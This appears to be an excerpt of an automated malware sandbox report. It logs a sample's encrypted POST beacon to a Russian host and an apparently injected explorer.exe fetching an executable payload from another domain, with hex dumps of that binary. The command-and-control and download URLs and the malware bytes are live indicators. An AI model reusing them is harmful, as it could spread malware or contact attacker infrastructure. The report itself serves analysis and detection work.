Nov 30, 2024 11:16:00.614301920 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cjnppqrvkvd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 347 Host: obozintsev.ru
Nov 30, 2024 11:16:00.614326000 CET	347	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 4e e5 aa Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA .[k,vu7Ns'zR(T))(*hmwF<j$0WPK0t1 "c'Eqa{Ho9gv7,(@+b^=
Nov 30, 2024 11:16:02.791148901 CET	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:16:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49791	23.145.40.181	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 10:13:12 UTC	167	OUT	GET /prog/ctlg.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: midginvineco.com
2024-11-30 10:13:12 UTC	327	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 10:13:12 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Last-Modified: Sat, 30 Nov 2024 10:00:02 GMT ETag: "2fe00-6281e610d494f" Accept-Ranges: bytes Content-Length: 196096 Connection: close Content-Type: application/x-msdos-program
2024-11-30 10:13:12 UTC	7865	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 a5 8c 4e 52 c4 e2 1d 52 c4 e2 1d 52 c4 e2 1d 4c 96 66 1d 49 c4 e2 1d 4c 96 77 1d 43 c4 e2 1d 4c 96 61 1d 0f c4 e2 1d 75 02 99 1d 55 c4 e2 1d 52 c4 e3 1d 2b c4 e2 1d 4c 96 68 1d 53 c4 e2 1d 4c 96 76 1d 53 c4 e2 1d 4c 96 73 1d 53 c4 e2 1d 52 69 63 68 52 c4 e2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 85 88 53 66 00 00 00 00 00 00 00 00 e0 00 03 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NRRRLfILwCLauUR+LhSLvSLsSRichRPELSf
2024-11-30 10:13:12 UTC	8000	IN	Data Raw: 53 bf 00 29 42 00 57 e8 56 29 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 d3 05 00 00 83 c4 14 68 04 01 00 00 be 19 29 42 00 56 6a 00 c6 05 1d 2a 42 00 00 ff 15 80 e0 41 00 85 c0 75 26 68 a8 e7 41 00 68 fb 02 00 00 56 e8 14 29 00 00 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 8f 05 00 00 83 c4 14 56 e8 6d 28 00 00 40 59 83 f8 3c 76 38 56 e8 60 28 00 00 83 ee 3b 03 c6 6a 03 b9 14 2c 42 00 68 a4 e7 41 00 2b c8 51 50 e8 8d 27 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 4c 05 00 00 83 c4 14 eb 02 33 f6 68 a0 e7 41 00 53 57 e8 f3 26 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 28 05 00 00 83 c4 14 8b 45 fc ff 34 c5 ac 12 42 00 53 57 e8 ce 26 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 03 05 00 00 83 c4 14 68 10 20 01 00 68 78 e7 41 00 57 e8 41 25 00 Data Ascii: S)BWV)tVVVVVh)BVj*BAu&hAhV)t3PPPPPVm(@Y<v8V`(;j,BhA+QP't3VVVVVL3hASW&tVVVVV(E4BSW&tVVVVVh hxAWA%
2024-11-30 10:13:12 UTC	8000	IN	Data Raw: 1e 74 0a 40 38 18 75 fb 40 38 18 75 f6 2b c6 40 50 89 45 f8 e8 cc 00 00 00 8b f8 59 3b fb 75 0c 56 ff 15 28 e1 41 00 e9 45 ff ff ff ff 75 f8 56 57 e8 b1 ea ff ff 83 c4 0c 56 ff 15 28 e1 41 00 8b c7 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 10 a1 08 10 42 00 83 65 f8 00 83 65 fc 00 53 57 bf 4e e6 40 bb bb 00 00 ff ff 3b c7 74 0d 85 c3 74 09 f7 d0 a3 0c 10 42 00 eb 60 56 8d 45 f8 50 ff 15 44 e1 41 00 8b 75 fc 33 75 f8 ff 15 40 e1 41 00 33 f0 ff 15 1c e1 41 00 33 f0 ff 15 3c e1 41 00 33 f0 8d 45 f0 50 ff 15 38 e1 41 00 8b 45 f4 33 45 f0 33 f0 3b f7 75 07 be 4f e6 40 bb eb 0b 85 f3 75 07 8b c6 c1 e0 10 0b f0 89 35 08 10 42 00 f7 d6 89 35 0c 10 42 00 5e 5f 5b c9 c3 83 25 e0 89 80 00 00 c3 8b ff 55 8b ec 56 57 33 f6 ff 75 08 e8 3d c6 ff ff 8b f8 59 85 ff 75 27 39 05 Data Ascii: t@8u@8u+@PEY;uV(AEuVWV(A_^[UBeeSWN@;ttB`VEPDAu3u@A3A3<A3EP8AE3E3;uO@u5B5B^_[%UVW3u=Yu'9
2024-11-30 10:13:12 UTC	8000	IN	Data Raw: 3b f7 75 1c e8 16 b1 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 7f c8 ff ff 83 c4 14 0b c3 eb 42 f6 46 0c 83 74 37 56 e8 08 ec ff ff 56 8b d8 e8 48 17 00 00 56 e8 f5 c6 ff ff 50 e8 6f 16 00 00 83 c4 10 85 c0 7d 05 83 cb ff eb 11 8b 46 1c 3b c7 74 0a 50 e8 7d a6 ff ff 59 89 7e 1c 89 7e 0c 8b c3 5f 5e 5b 5d c3 6a 0c 68 30 f7 41 00 e8 98 bd ff ff 83 4d e4 ff 33 c0 8b 75 08 33 ff 3b f7 0f 95 c0 3b c7 75 1d e8 93 b0 ff ff c7 00 16 00 00 00 57 57 57 57 57 e8 fc c7 ff ff 83 c4 14 83 c8 ff eb 0c f6 46 0c 40 74 0c 89 7e 0c 8b 45 e4 e8 9b bd ff ff c3 56 e8 41 c3 ff ff 59 89 7d fc 56 e8 2a ff ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 05 00 00 00 eb d5 8b 75 08 56 e8 8f c3 ff ff 59 c3 8b ff 55 8b ec b8 e4 1a 00 00 e8 15 19 00 00 a1 08 10 42 00 33 c5 89 45 fc 8b 45 0c Data Ascii: ;uWWWWWBFt7VVHVPo}F;tP}Y~~_^[]jh0AM3u3;;uWWWWWF@t~EVAY}V*YEEuVYUB3EE
2024-11-30 10:13:12 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-11-30 10:13:13 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-11-30 10:13:13 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-11-30 10:13:13 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-11-30 10:13:13 UTC	8000	IN	Data Raw: a9 25 b0 46 e5 15 07 55 5e da 78 55 15 e9 1c 5b 8e 65 2d 7f db fe 6d 8b b2 23 af a8 e1 51 6c 7f 80 3e 61 68 2b 37 da 62 ca d5 29 73 f2 b2 f7 de bf ed 89 15 6e 82 09 e7 82 bc 93 c2 86 53 71 75 3b 20 47 10 22 a2 bd 6b 73 82 ae 49 10 be 73 78 3e 19 8c e6 7f b9 1e 14 76 09 d1 c2 1b bd ff c9 7e 04 a4 a7 fe d7 8b 41 97 98 1e b9 ac fb 26 70 b1 3d 08 16 d5 1e 26 c5 cc 3b 53 8c 6d 23 83 8a 11 2a 68 5b c3 d6 e6 97 64 30 0f 9e 50 7c 3d b3 8c b4 ab 98 ed fa 1a d8 95 99 9f 96 33 ce c7 b2 cc 37 9e e8 da 40 e9 3a a2 36 f3 d6 34 e7 0c 33 7b cf 3e e1 d3 65 51 46 b9 7c 5f e3 b5 50 64 41 f8 5a e0 6d 43 4e 9c b7 28 1b a5 21 f1 b8 98 18 9b c4 a2 43 02 ba 70 92 fe 43 95 18 8a b1 81 7e 35 64 ce 60 78 72 db 99 2c 82 43 4a 22 74 ab 0a e2 98 02 65 18 ce be a9 35 64 7e 00 a1 d8 9e Data Ascii: %FU^xU[e-m#Ql>ah+7b)snSqu; G"ksIsx>v~A&p=&;Sm#*h[d0P\|=37@:643{>eQF\|_PdAZmCN(!CpC~5d`xr,CJ"te5d~
2024-11-30 10:13:13 UTC	8000	IN	Data Raw: cc 5c 01 e4 80 68 79 90 36 43 1c 30 74 66 52 18 ef be e6 83 88 79 88 c9 13 34 46 fa 53 b8 ea 61 0d 24 33 3f de 21 18 40 7b b5 37 5b dd 25 af d4 4c 89 d5 01 2c e2 77 14 62 47 c0 2f 87 df 0e 48 d9 1a 64 5c 1a 9b 3a c5 05 ea e9 5e c4 58 50 6b 53 db 08 02 4b 1e d3 5f fc cc 26 33 81 e7 6b fc d1 0b cb 08 a7 1e 10 e1 f2 a7 9d ac 24 77 95 e4 45 dd e8 39 5c 88 34 36 5b 72 f8 b5 05 6b e9 bd 4e 83 14 4b 17 d8 38 af 7b 77 4e 0d a5 3c 05 e8 14 c7 1c b1 77 2d 13 6e 18 4e fc cf af 74 d8 dc 52 54 ee 78 d1 38 3d f8 60 3b ec 58 79 7c 3f a9 87 ee f7 67 f6 ef 15 11 29 6c ec 57 ba de a6 77 5f c5 53 75 be 21 6a fc d9 68 25 1f 78 0a a9 a1 49 06 5e 2d 74 c2 41 c2 49 62 78 20 44 e0 0e 6e 9b 3c cc ef a4 ac 19 a5 51 ec ec 29 7e a1 42 7f 80 3c a5 97 e5 57 14 61 5f 7a b0 56 97 80 62 Data Ascii: \hy6C0tfRy4FSa$3?!@{7[%L,wbG/Hd\:^XPkSK_&3k$wE9\46[rkNK8{wN<w-nNtRTx8=`;Xy\|?g)lWw_Su!jh%xI^-tAIbx Dn<Q)~B<Wa_zVb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49875	23.145.40.181	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 10:13:44 UTC	167	OUT	GET /prog/ctlg.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: midginvineco.com
2024-11-30 10:13:44 UTC	327	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 10:13:44 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Last-Modified: Sat, 30 Nov 2024 10:00:02 GMT ETag: "2fe00-6281e610d494f" Accept-Ranges: bytes Content-Length: 196096 Connection: close Content-Type: application/x-msdos-program
2024-11-30 10:13:44 UTC	7865	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 a5 8c 4e 52 c4 e2 1d 52 c4 e2 1d 52 c4 e2 1d 4c 96 66 1d 49 c4 e2 1d 4c 96 77 1d 43 c4 e2 1d 4c 96 61 1d 0f c4 e2 1d 75 02 99 1d 55 c4 e2 1d 52 c4 e3 1d 2b c4 e2 1d 4c 96 68 1d 53 c4 e2 1d 4c 96 76 1d 53 c4 e2 1d 4c 96 73 1d 53 c4 e2 1d 52 69 63 68 52 c4 e2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 85 88 53 66 00 00 00 00 00 00 00 00 e0 00 03 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NRRRLfILwCLauUR+LhSLvSLsSRichRPELSf
2024-11-30 10:13:45 UTC	8000	IN	Data Raw: 53 bf 00 29 42 00 57 e8 56 29 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 d3 05 00 00 83 c4 14 68 04 01 00 00 be 19 29 42 00 56 6a 00 c6 05 1d 2a 42 00 00 ff 15 80 e0 41 00 85 c0 75 26 68 a8 e7 41 00 68 fb 02 00 00 56 e8 14 29 00 00 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 8f 05 00 00 83 c4 14 56 e8 6d 28 00 00 40 59 83 f8 3c 76 38 56 e8 60 28 00 00 83 ee 3b 03 c6 6a 03 b9 14 2c 42 00 68 a4 e7 41 00 2b c8 51 50 e8 8d 27 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 4c 05 00 00 83 c4 14 eb 02 33 f6 68 a0 e7 41 00 53 57 e8 f3 26 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 28 05 00 00 83 c4 14 8b 45 fc ff 34 c5 ac 12 42 00 53 57 e8 ce 26 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 03 05 00 00 83 c4 14 68 10 20 01 00 68 78 e7 41 00 57 e8 41 25 00 Data Ascii: S)BWV)tVVVVVh)BVj*BAu&hAhV)t3PPPPPVm(@Y<v8V`(;j,BhA+QP't3VVVVVL3hASW&tVVVVV(E4BSW&tVVVVVh hxAWA%
2024-11-30 10:13:45 UTC	8000	IN	Data Raw: 1e 74 0a 40 38 18 75 fb 40 38 18 75 f6 2b c6 40 50 89 45 f8 e8 cc 00 00 00 8b f8 59 3b fb 75 0c 56 ff 15 28 e1 41 00 e9 45 ff ff ff ff 75 f8 56 57 e8 b1 ea ff ff 83 c4 0c 56 ff 15 28 e1 41 00 8b c7 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 10 a1 08 10 42 00 83 65 f8 00 83 65 fc 00 53 57 bf 4e e6 40 bb bb 00 00 ff ff 3b c7 74 0d 85 c3 74 09 f7 d0 a3 0c 10 42 00 eb 60 56 8d 45 f8 50 ff 15 44 e1 41 00 8b 75 fc 33 75 f8 ff 15 40 e1 41 00 33 f0 ff 15 1c e1 41 00 33 f0 ff 15 3c e1 41 00 33 f0 8d 45 f0 50 ff 15 38 e1 41 00 8b 45 f4 33 45 f0 33 f0 3b f7 75 07 be 4f e6 40 bb eb 0b 85 f3 75 07 8b c6 c1 e0 10 0b f0 89 35 08 10 42 00 f7 d6 89 35 0c 10 42 00 5e 5f 5b c9 c3 83 25 e0 89 80 00 00 c3 8b ff 55 8b ec 56 57 33 f6 ff 75 08 e8 3d c6 ff ff 8b f8 59 85 ff 75 27 39 05 Data Ascii: t@8u@8u+@PEY;uV(AEuVWV(A_^[UBeeSWN@;ttB`VEPDAu3u@A3A3<A3EP8AE3E3;uO@u5B5B^_[%UVW3u=Yu'9
2024-11-30 10:13:45 UTC	8000	IN	Data Raw: 3b f7 75 1c e8 16 b1 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 7f c8 ff ff 83 c4 14 0b c3 eb 42 f6 46 0c 83 74 37 56 e8 08 ec ff ff 56 8b d8 e8 48 17 00 00 56 e8 f5 c6 ff ff 50 e8 6f 16 00 00 83 c4 10 85 c0 7d 05 83 cb ff eb 11 8b 46 1c 3b c7 74 0a 50 e8 7d a6 ff ff 59 89 7e 1c 89 7e 0c 8b c3 5f 5e 5b 5d c3 6a 0c 68 30 f7 41 00 e8 98 bd ff ff 83 4d e4 ff 33 c0 8b 75 08 33 ff 3b f7 0f 95 c0 3b c7 75 1d e8 93 b0 ff ff c7 00 16 00 00 00 57 57 57 57 57 e8 fc c7 ff ff 83 c4 14 83 c8 ff eb 0c f6 46 0c 40 74 0c 89 7e 0c 8b 45 e4 e8 9b bd ff ff c3 56 e8 41 c3 ff ff 59 89 7d fc 56 e8 2a ff ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 05 00 00 00 eb d5 8b 75 08 56 e8 8f c3 ff ff 59 c3 8b ff 55 8b ec b8 e4 1a 00 00 e8 15 19 00 00 a1 08 10 42 00 33 c5 89 45 fc 8b 45 0c Data Ascii: ;uWWWWWBFt7VVHVPo}F;tP}Y~~_^[]jh0AM3u3;;uWWWWWF@t~EVAY}V*YEEuVYUB3EE
2024-11-30 10:13:45 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-11-30 10:13:45 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-11-30 10:13:45 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-11-30 10:13:45 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-11-30 10:13:45 UTC	8000	IN	Data Raw: a9 25 b0 46 e5 15 07 55 5e da 78 55 15 e9 1c 5b 8e 65 2d 7f db fe 6d 8b b2 23 af a8 e1 51 6c 7f 80 3e 61 68 2b 37 da 62 ca d5 29 73 f2 b2 f7 de bf ed 89 15 6e 82 09 e7 82 bc 93 c2 86 53 71 75 3b 20 47 10 22 a2 bd 6b 73 82 ae 49 10 be 73 78 3e 19 8c e6 7f b9 1e 14 76 09 d1 c2 1b bd ff c9 7e 04 a4 a7 fe d7 8b 41 97 98 1e b9 ac fb 26 70 b1 3d 08 16 d5 1e 26 c5 cc 3b 53 8c 6d 23 83 8a 11 2a 68 5b c3 d6 e6 97 64 30 0f 9e 50 7c 3d b3 8c b4 ab 98 ed fa 1a d8 95 99 9f 96 33 ce c7 b2 cc 37 9e e8 da 40 e9 3a a2 36 f3 d6 34 e7 0c 33 7b cf 3e e1 d3 65 51 46 b9 7c 5f e3 b5 50 64 41 f8 5a e0 6d 43 4e 9c b7 28 1b a5 21 f1 b8 98 18 9b c4 a2 43 02 ba 70 92 fe 43 95 18 8a b1 81 7e 35 64 ce 60 78 72 db 99 2c 82 43 4a 22 74 ab 0a e2 98 02 65 18 ce be a9 35 64 7e 00 a1 d8 9e Data Ascii: %FU^xU[e-m#Ql>ah+7b)snSqu; G"ksIsx>v~A&p=&;Sm#*h[d0P\|=37@:643{>eQF\|_PdAZmCN(!CpC~5d`xr,CJ"te5d~
2024-11-30 10:13:45 UTC	8000	IN	Data Raw: cc 5c 01 e4 80 68 79 90 36 43 1c 30 74 66 52 18 ef be e6 83 88 79 88 c9 13 34 46 fa 53 b8 ea 61 0d 24 33 3f de 21 18 40 7b b5 37 5b dd 25 af d4 4c 89 d5 01 2c e2 77 14 62 47 c0 2f 87 df 0e 48 d9 1a 64 5c 1a 9b 3a c5 05 ea e9 5e c4 58 50 6b 53 db 08 02 4b 1e d3 5f fc cc 26 33 81 e7 6b fc d1 0b cb 08 a7 1e 10 e1 f2 a7 9d ac 24 77 95 e4 45 dd e8 39 5c 88 34 36 5b 72 f8 b5 05 6b e9 bd 4e 83 14 4b 17 d8 38 af 7b 77 4e 0d a5 3c 05 e8 14 c7 1c b1 77 2d 13 6e 18 4e fc cf af 74 d8 dc 52 54 ee 78 d1 38 3d f8 60 3b ec 58 79 7c 3f a9 87 ee f7 67 f6 ef 15 11 29 6c ec 57 ba de a6 77 5f c5 53 75 be 21 6a fc d9 68 25 1f 78 0a a9 a1 49 06 5e 2d 74 c2 41 c2 49 62 78 20 44 e0 0e 6e 9b 3c cc ef a4 ac 19 a5 51 ec ec 29 7e a1 42 7f 80 3c a5 97 e5 57 14 61 5f 7a b0 56 97 80 62 Data Ascii: \hy6C0tfRy4FSa$3?!@{7[%L,wbG/Hd\:^XPkSK_&3k$wE9\46[rkNK8{wN<w-nNtRTx8=`;Xy\|?g)lWw_Su!jh%xI^-tAIbx Dn<Q)~B<Wa_zVb

Target ID:	0
Start time:	05:11:53
Start date:	30/11/2024
Path:	C:\Users\user\Desktop\3WaqgS34S7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3WaqgS34S7.exe"
Imagebase:	0x400000
File size:	193'536 bytes
MD5 hash:	F99E6584C274E6814B81BE68C0F2EE47
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
